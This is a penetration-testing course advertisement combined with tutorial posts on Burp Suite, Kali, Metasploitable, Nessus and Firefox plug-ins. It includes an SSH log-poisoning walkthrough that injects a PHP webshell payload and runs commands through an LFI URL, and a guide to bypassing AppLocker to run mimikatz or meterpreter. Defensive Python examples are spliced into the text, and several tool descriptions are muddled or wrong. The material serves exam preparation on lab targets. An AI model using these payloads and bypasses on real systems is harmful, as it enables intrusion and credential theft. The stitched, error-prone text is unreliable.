Ultimate Hacklab – Self Paced (SP)

Ultimate hacklab – Self Paced (SP) – prep for hacking challenge lab exams like OSCP, LPT, eCPPT, and soon even the new CEH is going to be a hacking challenge lab as well.

If you really want to know what it takes to pass hack lab challenge-based exams like OSCP, LPT, eCPPT then ultimate hacklab is for you and it’s only $50.

The InfoSec Addicts Ultimate hacklab – Self Paced (SP) – is the best way for you to practice the skills required for almost any hands-on, lab-based penetration testing/ethical hacking certification.

The Ultimate hacklab – Self Paced (SP) – gives you the opportunity to follow along with a structured and very detailed training program, and/or make your way through the labs and just ask for help whenever you get stuck. You can run almost any tool and try almost any attack in the environment. The class is self-paced. You can sign up ANYTIME, and start IMMEDIATELY.

The program outlines how to create your own lab environment or you can connect to the InfoSec Addicts lab environment with almost any platform (Windows, Mac OS X, Kali Linux, other Linux distros) to go through the lab exercises.

Class syllabus:

  • Module 1: Connecting via VPN to the lab network
    • Connecting to the VPN with Windows
    • Connecting to the VPN with Mac OS X
    • Connecting to the VPN with Linux
    • Connecting to the VPN with Kali
  • Module 2: Scanning
    • Nmap
    • Net-Discover
  • Module 3: Enumeration
    • nmap NSE
    • rpcinfo/showmount
    • nbtstat
    • enum4linux
  • Module 4: Brute-forcing
    • Hydra
    • Medusa
  • Module 5: Vulnerability Scanning
    • Nessus
    • OpenVAS
  • Module 6: Attacking web servers/web apps
    • Manual XSS/SQL Injection/LFI/RFI
    • Nikto
    • Dirbuster
    • Burp Suite
    • w3af
    • Arachni
  • Module 7: Compiling/Modifying Exploit code
    • Compiling code in Windows
    • Compiling code in Linux
    • Finding offsets
    • Changing out shellcode
  • Module 8: Client-Side Exploitation
    • Metasploit
    • Social Engineering Toolkit
  • Module 9: Transferring files
    • FTP
    • TFTP
    • VBscript
    • Debug.exe
    • wget/linux/bitsadmin
    • PowerShell
  • Module 10: Privilege Escalation
    • Linux
      • SUID binaries
      • Shell escapes
    • Windows
      • Identifying vulnerable services/misconfigurations
      • beR00t.exe
  • Module 11: Data-mining a compromised host
  • Module 12: Hashcracking
  • Module 13: Pivoting
    • Netcat/Socat pivot
    • SSH Pivot
    • Metasploit pivot
  • Module 14: Lateral movement
    • psexec
    • smbexec
    • winexe
  • Module 15: Data Exfiltration
    • ICMP Tunneling
    • DNS Tunneling
  • Module 16: Reporting

Lab Network Access

Targets in the lab network change on the 1st of every month. Students have the option to purchase one month's access to the lab environment for $25.

Students will receive:

  • Up to 124 hours of CPEs (24 CPE for the actual training and the rest come from labs and challenges completed by the students)
  • Several virtual machines
  • Courseware access
  • Lab Manual
  • Lab access

Class Videos

Each course module has a corresponding video that demonstrates the task being performed, so you can see the skill or task described in each lesson actually being carried out.

Support

Each student will have access to an InfoSec Addicts Group (infosecaddicts.com) for the class. This is also where they can work with other students on lab exercises, homework, and challenges. An InfoSec Addicts class mentor will be assigned to the group to answer questions (allow one day for responses). Likewise, a Customer Relationship Manager will be assigned to the class to manage questions and support issues.

Class Schedule

The class is self-paced. You can sign-up ANYTIME, and start IMMEDIATELY.


BurpSuite

What is BurpSuite?


When it comes to securing web applications, Burp Suite stands out. PortSwigger Security is the company that produces Burp Suite, which is written in the Java programming language. In fact, there are two versions of this important security tool:

  1. A free version that anyone can download online, named the Free Edition.
  2. A paid version, referred to as the Professional Edition. It is usually purchased after a period of free trial.

Burp Suite was designed as a complete web application solution covering the entire process of checking and fixing web application security. One of the more interesting points about Burp Suite is that a mobile application with the same tools as the desktop version was developed for use on newer iOS versions.

What are the tools that BurpSuite offers?


Let's now have a look at the tools that Burp Suite provides its users with. There are several tools offered by Burp Suite, and they facilitate penetration testing to establish the security of a web application.

  1. HTTP proxy: Burp Suite offers a web proxy server that sits, man-in-the-middle style, between a client's browser and the web server at the other end of the connection. Any raw traffic running between the two ends can then be inspected and modified.
  2. Scanner: Burp Suite also offers a scanner for web application vulnerabilities, which can automate the search for such vulnerabilities. This is a very important part of web application penetration testing and security.
  3. Intruder: the value of this tool is its ability to launch attacks against a vulnerable web application. It supports several kinds of attack, including SQL injection, cross-site scripting, parameter manipulation and brute-forcing of susceptible vulnerabilities. The tool searches for such attackable weaknesses and, once one is detected, the attack can be launched. The user is given a configurable algorithm for generating the HTTP requests.
  4. Spider: when the content of an application is to be mapped manually, this tool makes it easy and fast to map the application's content and functionality. It can crawl a web application.
  5. Repeater: a user can test an application with this tool. The tool sends a modified request to the server, then another request reaches the application, and the results are observed to understand the application's behaviour.
  6. Decoder: this tool is very useful when dealing with encoded data. It can recognize and detect different encoding formats using several techniques, so encoded data can be brought back to its canonical form. It also works the other way around, transforming raw data into hashed and encoded forms.
  7. Comparer: this tool compares two pieces of data and highlights any differences between them.
  8. Extender: this tool lets third-party code and security testers make use of Burp Suite, so that Burp Suite extensions can be loaded for additional security functionality.
  9. Sequencer: this tool helps analyze and measure the quality of randomness in a sample of data items. In this way, session tokens or other values that are meant to be secure and unpredictable can be tested for predictability. Examples of such vital tokens are anti-CSRF tokens, password reset tokens, and others; they are meant never to be guessed or discovered.
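The Sequencer test described in item 9 can be approximated in a few lines. The following is an added example, not code from the original page or from PortSwigger: it treats each character position of a token sample as a symbol source, sums the per-position Shannon entropy and compares the total with the maximum a generator over that alphabet could reach. The two sample generators, the 0.8 threshold and the function names are the example's own assumptions.

```python
"""Estimate how unpredictable a sample of tokens is, position by position.

Added example (not part of the original page or of Burp Suite): a minimal
version of what Burp's Sequencer does, for anyone who wants to check that a
session-token or reset-token generator is not predictable.
"""
import math
import secrets
from collections import Counter


def position_entropy(tokens, index):
    """Shannon entropy (bits) of the character at one position across the sample."""
    counts = Counter(tok[index] for tok in tokens)
    total = sum(counts.values())
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def assess_tokens(tokens, alphabet_size=16):
    """Sum per-position entropies and compare them with the theoretical maximum.

    Tokens must all have the same length; alphabet_size is the number of
    distinct symbols the generator could emit at each position (16 for hex).
    Returns observed bits, the maximum possible bits, and their ratio.
    """
    length = len(tokens[0])
    if any(len(t) != length for t in tokens):
        raise ValueError("all tokens in the sample must have the same length")
    observed = sum(position_entropy(tokens, i) for i in range(length))
    maximum = length * math.log2(alphabet_size)
    return {"bits": observed, "max_bits": maximum, "ratio": observed / maximum}


def is_predictable(tokens, min_ratio=0.8):
    """Flag a generator whose sample lands well under the maximum entropy."""
    return assess_tokens(tokens)["ratio"] < min_ratio


# Constructed samples: a plain counter disguised as a 64-bit hex token (weak)
# and tokens drawn from the OS CSPRNG (strong).
def weak_sample(n=500):
    return ["%016x" % i for i in range(n)]


def strong_sample(n=500):
    return [secrets.token_hex(8) for _ in range(n)]


if __name__ == "__main__":
    for name, sample in (("counter", weak_sample()), ("csprng", strong_sample())):
        r = assess_tokens(sample)
        print(f"{name}: {r['bits']:.1f} of {r['max_bits']:.0f} bits, "
              f"predictable={is_predictable(sample)}")
```

The counter-based sample keeps almost every position constant, so its summed entropy stays near 9 bits out of 64, while the CSPRNG sample sits just under the maximum; that gap, not an absolute number, is what a Sequencer-style check looks for.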

Let’s now get started with Burp Suite

How to launch Burp Suite?

  1. The software is written in Java and distributed as a .jar file, which is a standalone Java archive.
  2. Browse to the PortSwigger website (PortSwigger.net) and download the free edition from there.
  3. If you are a professional user, log in with your credentials and download the Professional Edition instead.
  4. Running a .jar file requires a Java environment; the contents of the file do not need to be unpacked.
  5. Make sure Java is installed before starting Burp Suite.
  6. Open a command prompt; the method differs by operating system:


  • On Windows, press the Start button, type "cmd" into the search box, and click the program to open it.
  • On Mac OS X, open "Applications" from the system dock, click "Utilities", and choose the "Terminal" app.
  • On Linux, choose "Console" or "Shell" from the list of applications.
  7. Inside the command prompt you just opened, type the following command: "java -version"
  8. If Java is already installed on the machine, a message like the following should appear: "java version "1.6.0_21"". Note that the required version of Java is at least 1.6.
  9. Now the Burp .jar file can be double-clicked to open Burp directly. However, launching Burp from the command line gives you more control and several options at execution time, for example specifying how much memory should be dedicated to running Burp Suite on the machine.
  10. Try the following command, for instance:
    java -jar -Xmx1024m /path/to/burp.jar

This command allocates 1024 MB of memory to Burp, with the Burp file located at /path/to/burp.jar.

  11. A splash screen should now be displayed, indicating that it works.

Let’s get to select a project

There are actually three categories to choose between when it comes to opening a project or creating a new one:

  1. Temporary Project: if there is no need to save the data for later use, this option works best. All data is kept in volatile memory only.
  2. New Project on Disk: this option requires a Burp project file. A new project is created and a name should be given to it.
  3. Open Existing Project: this simply opens an existing project. Note, however, that the Spider and Scanner tools are paused by default at that moment.


How to perform SSH Log Poisoning through LFI to exploit a web server?

It is worth knowing a powerful method to exploit a web server that suffers from local file inclusion (LFI). Let's assume we are working on a Metasploitable 2 target and that the operating system used to run the attack is Kali Linux.


The following steps explain how one can perform this process on Kali Linux:

  1. Open the Kali Linux terminal.
  2. Connect to the target over SSH. The following command can be used:
    ssh msfadmin@192.168.1.105
  3. Check the permissions of the auth.log file beforehand with the following command:
    ls -l /var/log/auth.log
  4. Most of the time the auth.log file has read-write permissions for its owner and read permission for everyone else. The listing should look like the following:
    -rw-r--r-- 1 syslog adm ...
  5. We can now access the file and read all its logs with the following command:
    tail -f /var/log/auth.log
  6. We can walk through the logs and check the specific entries for the user named "msfadmin".
  7. Now, let's attempt to connect to the server using a counterfeit username. The following command produces an invalid login:
    ssh hacker@192.168.1.105
  8. Permission should now be denied, shown clearly as follows:
    "Permission denied, please try again."


  9. Then go back to the auth.log file and check whether this fake or invalid attempt has been recorded. It should show that the invalid user tried to gain access. If the attacker used the IP address 192.168.1.104, the following should be displayed:
    "Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
  10. This means that every login, successful or invalid, is recorded in the logs. Now let's try passing PHP code as the invalid username and see what happens. The following command attempts a login with a PHP snippet as the user name:
    ssh '<?php system($_GET['c']); ?>'@192.168.1.105
  11. Go back to the auth.log file again and check whether this invalid attempt has been recorded. It should show that the invalid user tried to gain access. If the attacker used the IP address 192.168.1.104, the following should be displayed:
    "Failed Password for invalid user <?php system($_GET['c']); ?> from 192.168.1.104 port 49642 ssh2"
  12. Let's assume that an LFI vulnerability has already been set up, and browse to it using the following link:
    192.168.1.105/lfi/lfi.php
  13. An error will appear that indicates a local file inclusion vulnerability.
  14. Now include the auth.log file as a parameter through the following URL in the browser:
    192.168.1.105/lfi/lfi.php?file=/var/log/auth.log
  15. Note that a warning will be displayed with the following text:
    Warning cannot execute a blank command
  16. Let's discuss what this actually means. The PHP code injected earlier, which calls system() on the c parameter, has been included and executed with an empty command. Any command can now be sent through that parameter.
  17. Now browse to
    "192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps"
    This will dump the contents of auth.log and also execute the command given through the c parameter.
  18. Now browse to
    "192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=pwd"
    This way, the results are displayed in the browser window.
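A defender can turn the same log format against this technique. The following is an added example, not code from the original page or from any tool it mentions: it parses sshd's failed-login lines, flags usernames that contain PHP or shell code (the poisoning step above), and checks whether auth.log's mode bits leave it readable to every local user, which is what lets the web server include it. The sample lines, addresses, ports and function names are constructed for the example.

```python
"""Spot SSH log-poisoning attempts in auth.log before an LFI bug can use them.

Added example (not part of the original page): sshd writes the unvalidated
username of a failed login into /var/log/auth.log, which is exactly what the
walkthrough above relies on. This scanner extracts the username from each
failed-login line and flags usernames that carry code; it also checks whether
the log's permission bits make it world-readable.
"""
import re
import stat

# sshd's own formats for rejected logins; the "invalid user" prefix appears
# when the account does not exist at all.
_SSHD_RE = re.compile(
    r"(?:Failed password for|Invalid user) (?:invalid user )?"
    r"(?P<user>.+?) from (?P<ip>[0-9a-fA-F.:]+) port (?P<port>\d+)"
)

# Fragments that have no business in a username: PHP tags, superglobals,
# code-execution functions, shell metacharacters.
_CODE_RE = re.compile(
    r"<\?|\?>|\$_(?:GET|POST|REQUEST|COOKIE)"
    r"|\b(?:system|exec|passthru|shell_exec|eval)\s*\(|[`;|]"
)


def parse_sshd_line(line):
    """Return (user, ip, port) for a failed-login line, or None for anything else."""
    m = _SSHD_RE.search(line)
    if not m:
        return None
    return m.group("user"), m.group("ip"), int(m.group("port"))


def poisoned_usernames(lines):
    """Return (user, ip) for every failed login whose username looks like code."""
    hits = []
    for line in lines:
        parsed = parse_sshd_line(line)
        if parsed and _CODE_RE.search(parsed[0]):
            hits.append((parsed[0], parsed[1]))
    return hits


def world_readable(mode):
    """True if the 'other' read bit is set, as in the 0644 listing shown above.

    A mode of 0640 with group adm (Debian's default for auth.log) keeps the
    web server's account out of the file, so a poisoned entry cannot be included.
    """
    return bool(mode & stat.S_IROTH)


# Constructed sample lines in sshd's format (hosts, IPs and ports are made up).
SAMPLE_LOG = [
    "Jan  1 12:00:01 host sshd[1001]: Failed password for msfadmin from 192.0.2.10 port 50001 ssh2",
    "Jan  1 12:00:05 host sshd[1002]: Failed password for invalid user hacker from 192.0.2.10 port 56566 ssh2",
    "Jan  1 12:00:09 host sshd[1003]: Invalid user <?php system($_GET['c']); ?> from 192.0.2.10 port 49642",
    "Jan  1 12:00:09 host sshd[1003]: Failed password for invalid user <?php system($_GET['c']); ?> from 192.0.2.10 port 49642 ssh2",
    "Jan  1 12:00:20 host sshd[1004]: Accepted publickey for alice from 192.0.2.11 port 50002 ssh2",
]

if __name__ == "__main__":
    for user, ip in poisoned_usernames(SAMPLE_LOG):
        print(f"log poisoning attempt from {ip}: {user!r}")
    print("0644 is world-readable:", world_readable(0o644))
    print("0640 is world-readable:", world_readable(0o640))
```

Run against a real auth.log, the same function reads the file line by line; an alert on the first hit is cheap, and the permission check is the one-line reason the inclusion step fails on a correctly configured host.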

What is Kali Linux? 

One of the most important security tools to understand and work on very well is, in fact, Kali Linux. But let’s discuss its benefits in a nutshell.


  • It is considered an essential tool for penetration testing and digital forensics.
  • It provides its users with a variety of tools and functions that fall into thirteen categories:
    • Information Gathering, such as Dmitry
    • Vulnerability Analysis, such as Inguma
    • Exploitation Tools, such as the Metasploit Framework
    • Wireless Attacks, such as WiFi Honey
    • Forensics, such as Binwalk
    • Web Applications, such as Skipfish
    • Stress Testing, such as FunkLoad
    • Sniffing and Spoofing, such as Wireshark
    • Password Attacks, such as TrueCrack
    • Maintaining Access, such as Intersect
    • Hardware Hacking, such as dex2jar
    • Reverse Engineering, such as Apktool
    • Reporting Tools, such as MagicTree

What is Metasploitable?


Basically, Metasploitable is an intentionally vulnerable machine intended for training, testing exploits, or general target practice. The unique aspect of Metasploit here is that it can check vulnerabilities at the operating system and network service layers, not merely at the application layer.

Metasploitable 2 is like a well-stocked bag containing a bunch of security tools such as Metasploit. A production environment usually has Metasploitable 2 to help with examining and practicing the exploitation of vulnerabilities.

Metasploitable 3 is a newer version of Metasploitable. It is a virtual machine built from the ground up with a large number of security vulnerabilities. With this version, Metasploit is the security tool used to test exploits. Metasploitable 3 was originally released under a BSD-style license.

The following are requirements to run Metasploitable:

  1. An operating system which is capable of running all of the required applications listed below.
  2. VT-x/AMD-V Supported Processor recommended
  3. 65 GB Available space on drive
  4. 4.5 GB RAM

So we have mentioned that Metasploitable basically relies on Metasploit. Let's spend the last few lines on Metasploit itself.


The Metasploit Project is a computer security project that provides information about vulnerabilities and aids in penetration testing. Penetration testing refers to an authorized, simulated attack on a computer system. The project looks for security weaknesses and also produces Intrusion Detection System (IDS) signatures; an IDS, in turn, monitors a network or systems for malicious activity. Its best-known sub-project is the famous open-source Metasploit Framework, the most widely used exploit development framework in the world. I will elaborate on this framework idea later on in this article.

Finally, Metasploit can be used for both legitimate and unauthorized access and activity on computer systems. In this regard, it is no different from comparable commercial products such as Immunity's Canvas or those of Core Security Technologies. Metasploit, however, is commonly used to break into remote systems or to test a computer system for vulnerabilities.


Nessus

What is Nessus?

Nessus is renowned software from Tenable Network Security. It specializes in monitoring and scanning for security vulnerabilities. The initial release of this software was free to use for non-enterprise clients. According to sectools.com, it ranked as the first vulnerability scanner and the most popular among its counterparts in 2000, 2003, and 2006.


There are four main types of Nessus software. Nessus Cloud is a Software as a Service (SaaS) platform. Nessus Manager serves as a physical or virtual vulnerability manager. Nessus Professional is a version that runs on a device such as a laptop or a personal computer (PC). Finally, the free type of Nessus is Nessus Home, for home users.

Historical Overview


In 1998, Renaud Deraison aimed to create a free remote security scanner and publish it online, making it available for all people around the world. Back then, the project was an open source project. This was until the year 2005 when it turned to a closed source owned by Tenable Network Security, cofounded by Deraison.

In 2005, Tenable Network Security reported that more than seventy-five thousand organizations around the world used it. At that time the current version was Nessus 3, and to this day its engine is free to use, but it costs $100/month per scanner. Nessus 3 supports Microsoft Windows, Unix, Linux, and some other operating systems.

Before Nessus 3, however, there was Nessus 2, which required an agent to operate on several operating systems. Needless to say, it was slow to use back then. Nessus 2 was released under the General Public License (GPL), paving the way for similar open-source projects such as OpenVAS and Porz-Wahn. Despite this, Tenable Network Security still implemented many updates to this version of Nessus even after Nessus 3 came into existence.

In 2008, things improved somewhat from both the company's and the users' perspective, when a free version for home users gained access to plugin feeds. Enterprises, meanwhile, had (and still have) to pay to use the software for commercial purposes.

In 2009, Tenable Network Security released Nessus 4. It would later release Nessus 5 in 2012 and later the newest version, Nessus 6, in 2014.

What does Nessus do?


Let’s now discover what features it has, and to what extent such software could be beneficial for security purposes. First of all, let me begin with some services that Nessus 3 and its descendants are able to provide their holders with.

  • It automatically scans for vulnerabilities and analyzes them in order to prioritize recommended remediation.
  • Plug-ins are fed to customers' systems every day, keeping them up to date with newly disclosed vulnerabilities so that these can be detected.
  • It supports Supervisory Control and Data Acquisition (SCADA) audits.
  • It supports audits of embedded devices.
  • It offers mobile device scanning.
  • Web applications and cloud environments can also be assessed with it.
  • It can search for sensitive data such as social security numbers, credit card details, and much other confidential information.
  • Nessus 3 offers technical support to an organization.
  • It can audit anti-virus configurations.
  • It can audit against Federal Desktop Core Configuration (FDCC) standards.
  • Nessus 3 supports Payment Card Industry Data Security Standard (PCI-DSS) audits as well.

Now, why don’t we break down the types of vulnerabilities detectable when scanning through it?

  1. Password-related vulnerabilities such as
    • system accounts having no passwords
    • system accounts having default passwords, or passwords set on initial setup or after a reset
  2. Vulnerabilities through which remote exploitation could grant access to sensitive data
  3. Misconfiguration vulnerabilities such as missing software patches or an open mail relay
  4. Denial-of-service vulnerabilities in the TCP/IP stack, found by sending mangled packets over the network
  5. Preparation for conducting PCI DSS audits

Is Nessus actually necessary?

The answer to this question is logically deductible after summarizing its unique capabilities. These abilities could help determine the reasons for choosing it.

  • Endpoint agents can be configured on a device:
    • They allow offline scans and report the results to Nessus Cloud and Nessus Manager administrators whenever an internet connection is established.
    • They can also scan devices for malware.
  • Upon buying Nessus Professional for an organization, or hosting on Nessus Cloud or Nessus Manager, technical support for any related issue is always available.
  • On-demand, completely free training is offered either in Tenable Network Security's own centers, virtually, or on-site at the customer's location.
  • The Nessus console has an enhanced, user-friendly Graphical User Interface (GUI):
    • Security policies can be applied with a few clicks and checkboxes.
    • Administrators can have email notifications sent out with scan results and recommended remediation.
    • Administrators can run preconfigured or customized reports per host.
  • It provides a Representational State Transfer Application Program Interface (RESTful API) for easy integration into any organization.
  • Both Nessus Cloud and Nessus Manager integrate with CyberArk for credential management, and with various patch management systems. Some of the companies providing such systems:
    • For computer systems: Microsoft, Dell, IBM, and Red Hat.
    • For mobile systems: Apple, Microsoft, AirWatch, and MobileIron.

Given all of these premises and depending on several business practices, my answer to the initial question is definitely yes. All of the aforementioned characteristics distinguish it from all of its other software counterparts. Some other scanners may have one of these characteristics, yet it is almost impossible so far to find something containing all of such powers.

How to use Nessus for Penetration testing?

Nessus is not actually a penetration testing tool. However, its scanning results, when combined with penetration testing tools, can be an indicator of a computer system's security risk. Testing tools that could be used in this regard are Immunity CANVAS, Core IMPACT, and of course Metasploit. In addition, in the case of a password-related vulnerability, it can use the password cracking tool Hydra to obtain the password and gain access.

One, for instance, could harness the tools of Nessus Home to the maximum to help with penetration testing. Nessus Home is a free version as mentioned before.

  1. Download and install it.
  2. Set up a Nessus account and activate the installed copy with the activation code.
  3. Start a vulnerability scan.
  4. Understand the results: if you chose Basic Network Scan, go through each device's Internet Protocol (IP) address and understand where the vulnerabilities actually originate from.
  5. Discover how to exploit such devices. Though Nessus does not specialize in this, it will show you where to go.
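Step 4 is easier once the scan is exported to a file. The following is an added example, not code from the original page or from Tenable: it parses a constructed .nessus (XML) export, the format Nessus uses to save a scan, and ranks hosts by the severity of their findings so the IP addresses that need attention surface first. The hosts, plugin IDs and finding texts in the sample are invented; the element and attribute names follow the .nessus v2 layout.

```python
"""Triage the findings in a Nessus export so the worst hosts come first.

Added example (not part of the original page or of Tenable's software). A
.nessus file is XML: ReportHost elements carry one ReportItem per finding,
with the severity as an attribute on Nessus' 0-4 scale (Info, Low, Medium,
High, Critical) and the remediation text in a <solution> child.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample in the .nessus v2 layout (hosts, plugin IDs and text are invented).
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="lab scan">
    <ReportHost name="192.0.2.20">
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
                  pluginID="10267" pluginName="SSH Server Type and Version Information">
        <risk_factor>None</risk_factor>
        <solution>n/a</solution>
      </ReportItem>
      <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="4"
                  pluginID="999901" pluginName="Example FTP backdoor (constructed)">
        <risk_factor>Critical</risk_factor>
        <solution>Remove or upgrade the affected FTP service.</solution>
      </ReportItem>
    </ReportHost>
    <ReportHost name="192.0.2.21">
      <ReportItem port="80" svc_name="www" protocol="tcp" severity="2"
                  pluginID="999902" pluginName="Example outdated web server (constructed)">
        <risk_factor>Medium</risk_factor>
        <solution>Apply vendor patches.</solution>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Return one dict per ReportItem found in a .nessus document."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        for item in host.findall("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port")),
                "protocol": item.get("protocol"),
                "service": item.get("svc_name"),
                "plugin_id": item.get("pluginID"),
                "plugin_name": item.get("pluginName"),
                "severity": int(item.get("severity")),
                "solution": (item.findtext("solution") or "").strip(),
            })
    return findings


def rank_hosts(findings, min_severity=1):
    """Map host -> its findings at or above min_severity, worst host first.

    Hosts are ordered by their highest severity and then by number of
    findings, so a host with only Info-level output drops out by default.
    """
    per_host = defaultdict(list)
    for f in findings:
        if f["severity"] >= min_severity:
            per_host[f["host"]].append(f)
    for items in per_host.values():
        items.sort(key=lambda f: f["severity"], reverse=True)
    ordered = sorted(per_host.items(),
                     key=lambda kv: (max(f["severity"] for f in kv[1]), len(kv[1])),
                     reverse=True)
    return dict(ordered)


if __name__ == "__main__":
    for host, items in rank_hosts(parse_nessus(SAMPLE_NESSUS)).items():
        print(host)
        for f in items:
            print(f"  [{SEVERITY_NAMES[f['severity']]}] {f['port']}/{f['protocol']} "
                  f"{f['plugin_name']} -> {f['solution']}")
```

Swap SAMPLE_NESSUS for the contents of a real export and the same two functions give a per-host worklist; raising min_severity to 3 narrows it to High and Critical only.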


How to Bypass a Windows AppLocker?

Quick Background on AppLocker

First, we need to get an insight into what an Applocker is and its mechanism before going through the technical details.

AppLocker is basically software from Microsoft that grants some users specific privileges while denying other users the same privileges. In other words, some users have the freedom to open particular applications on the operating system, whereas others do not have the right to open them. For instance, one user could freely run Internet Explorer while another cannot even open it. Most sensitive machines, such as Automated Teller Machines (ATMs) and computers inside important organizations, all use AppLocker.

AppLocker essentially covers five main categories of files:

  • Executable files coming in .exe and .com extensions such as ipconfig.exe
  • Installer files which are utilized by Windows to get any new software installed on the computer or the machine; such files come in .msi, .msp, and .mst extensions
  • Script files which come in .ps1, .vbs, .vba, and .cmd and .js extensions
  • Packaged Apps which one installs through Microsoft Store
  • DLL files which come in .dll and .ocx extensions

Throughout this article, the focus is on the common file formats that come up when talking about security restrictions and privileges with AppLocker. Therefore, I will mostly cover executable files, installers, and script files.

How to activate AppLocker on your machine

  1. Open Administrative Tools -> Services
  2. Open the Group Policy Editor, which is gpmc.msc on a domain controller and gpedit.msc on a local machine
  3. If the previous steps did not work, type "Edit group policy" into the search box in the menu bar.
  4. Under "Security Settings" open "Application Control Policies"
  5. Press "Configure Rule Enforcement" to choose among the five aforementioned application categories and apply appropriate filtering for each.
  6. Three main criteria determine the rules that govern the usage of each of those categories:

a. Execution Path:

By default, all executable files and scripts which reside inside the following two directories “C:\Windows” and “C:\Program Files” are allowed. If this was not the case for such files in these locations, the system would not boot in the first place.

b. Information about the Publisher:

Sometimes AppLocker relies on the vendor's public key, which was used to sign a specific executable or binary file. Based on this, AppLocker may decide to allow or deny such a file.

c. File Hash:

AppLocker stores Message Digest 5(MD5) hashes of executable files, and therefore depends on them to decide whether to allow a certain file or not. Although this aspect requires a great deal of memory usage, it is essential for AppLocker in order to prevent any hazardous executable file from running.

Consider a Standard Setup

When the user does not change any of the default rules, we are left unable to run any executable file anywhere on the machine other than those located under "C:\Windows" and "C:\Program Files". This is a problem because, for instance, we cannot run Meterpreter.exe.

There is, in fact, a way around this problem. Think of it this way: executable files are not allowed to run from several locations on the machine, while other locations do not prevent the same executables from running. If you can find those latter locations, then even as a standard user with no admin privileges you can run any executable you like on the machine; it seems straightforward, right? It is, however, tedious to go through each location manually and investigate which rules apply to it. What is the solution, then?

Basically, a PowerShell script is an appropriate way to automatically identify where we can write (and therefore run our executable). A default installation leaves "C:\Windows\Tasks" and "C:\Windows\tracing" writable by everyone.

  • To have PowerShell show us these locations, the "Get-Content" and "Invoke-Expression" commands are used.

  • Once we know these locations are writable, copy the desired executable there ("mimikatz.exe", "meterpreter.exe", or whatever executable you want to run on the machine).
  • Now run the executable. Note that the reason for using an executable is simplicity, for example when you have a particular piece of malware or a custom tool. An attack does not require an executable, however; it could be done purely with Invoke-Expression, which bypasses any execution-path restriction.

Now, consider this case instead. You have searched for writable directories, and weren’t able to find any. How would you react then? If we could store the executable file that we want somewhere in the memory and then jump to its address/location without the need for any directories, then, we would solve the problem.

  • Use a PowerShell variable to store the executable file.
  • Make use of the PowerSploit framework's Invoke-ReflectivePEInjection function. It loads the file into a memory location, to which you then jump in order to run the file.

Consider a more advanced Setup

What if the user was aware of the weaknesses of the default rules and restricted the use of cmd.exe and PowerShell.exe, to make sure that none of the previous steps, which rely on these applications, could be used?

  • Look for something the user forgot to block.
  • In this case, the user took care of all the 64-bit Windows tools and applied the rules he wanted to them, but overlooked the 32-bit tools, which are the way to go instead. Simply use the "C:\Windows\SysWOW64\" location to open PowerShell, from where we can work with our executable as described before.
  • Even if we merely search for "PowerShell.exe", we find several versions of PowerShell, each with its own unique hash. There are still plenty of PowerShell binaries with hashes other than the blocked one.
  • If all of the above instances of PowerShell are blocked along with cmd.exe, there is still a way out.
  • Use "C:\Windows\System32\wbem\wmic.exe". This utility gets us very close to the same information about the system. It is of course not as easy as with PowerShell; nevertheless, it provides an alternative.

Consider a more advanced Setup

The user could be capable enough to block all of the previous methods. Even WMIC cannot run in this case. There is always a way out!

  • Note which DLL files are not blocked.
  • Search online for a DLL implementation of PowerShell.
  • Download it into any folder.
  • Run the file using the "C:\windows\system32\rundll32.exe" utility.
  • To execute it, type the DLL and its entry-point function; in our case, "rundll32.exe PowerShdll.dll,main".

References:

http://www.hacking-tutorial.com/hacking-tutorial/how-to-bypass-windows-applocker/#sthash.yGAUxClg.dpbs

https://technet.microsoft.com/en-us/library/ee460956(v=ws.11).aspx

FIREFOX PLUG-INS REVIEW

FIREFOX PLUG-INS EVERY SECURITY PROFESSIONAL NEEDS TO KNOW

Plug-ins are additional features in a browser that enhance the user experience. Firefox is one browser that supports a variety of plug-ins, which can include video scripts, animations, and other elements that browsers alone do not typically support.

Understanding how plug-ins work and interact with browsers is important, because many malicious attacks use plug-ins as a tool for intrusion and theft. Understanding how plug-ins work also helps us secure our own systems properly.

Plug-ins serve a multitude of purposes: safe browsing, information gathering, entertainment, and more. Below are useful plug-ins one can use to gather information and carry out penetration testing.

FoxyProxy Standard

This add-on is a proxy management tool. It improves the browser's proxy capabilities and provides pattern matching on URLs. It switches the network connection among different proxy servers, and an animated icon in the browser shows when a proxy is in use.

FoxyProxy Standard has a history tab that logs the servers used. The plug-in can be configured to use a proxy only when a URL matches a given pattern, which makes it more efficient than other proxy management plug-ins.


Firebug

This is a Firefox web development tool embedded into the browser. It enables editing HTML, JavaScript or CSS directly on the live page, and the changes are visible immediately after saving.

This plug-in helps pinpoint web application and web page vulnerabilities. It opens a window from which to launch a penetration test and can collect a user's data. It also enables inspection of the HTML elements on the page.

The CSS tab checks and edits the style of the page. It is a convenient way to edit the look of the page and view the changes immediately. Code can also be copied out for further development outside the browser. It also enables scaling and margin setup to align text and images.

Furthermore, Firebug monitors network activity. If a page is loading slowly, you can check what causes the lag from this plug-in. Firebug has a powerful JavaScript debugger that identifies errors and measures performance of a script.

The DOM tab in the Firebug panel helps identify code tags and edit them. This plug-in also allows easy management of cookies: all accepted cookies are listed with their values for review.


Live HTTP Headers

Live HTTP Headers is an effective penetration-testing tool for troubleshooting, tuning and analyzing a website. The plug-in exposes header data such as language, caching, authorization, and character set. Normally this data is invisible; this plug-in, however, gives access to it.

To obtain header information, right-click on the page and select "View Page Info." Next, click the header tab in the new pop-up window to view page information. Press "Ctrl+Shift+A" to replay the header.


This plug-in is considered a sniffer application because it can view the HTTP header exchange. You can see what is happening, analyze it, and stop the capture. To change header or URL values, you only need to highlight, edit and replay a request. Finally, it works on both Windows and Linux.

Hackbar

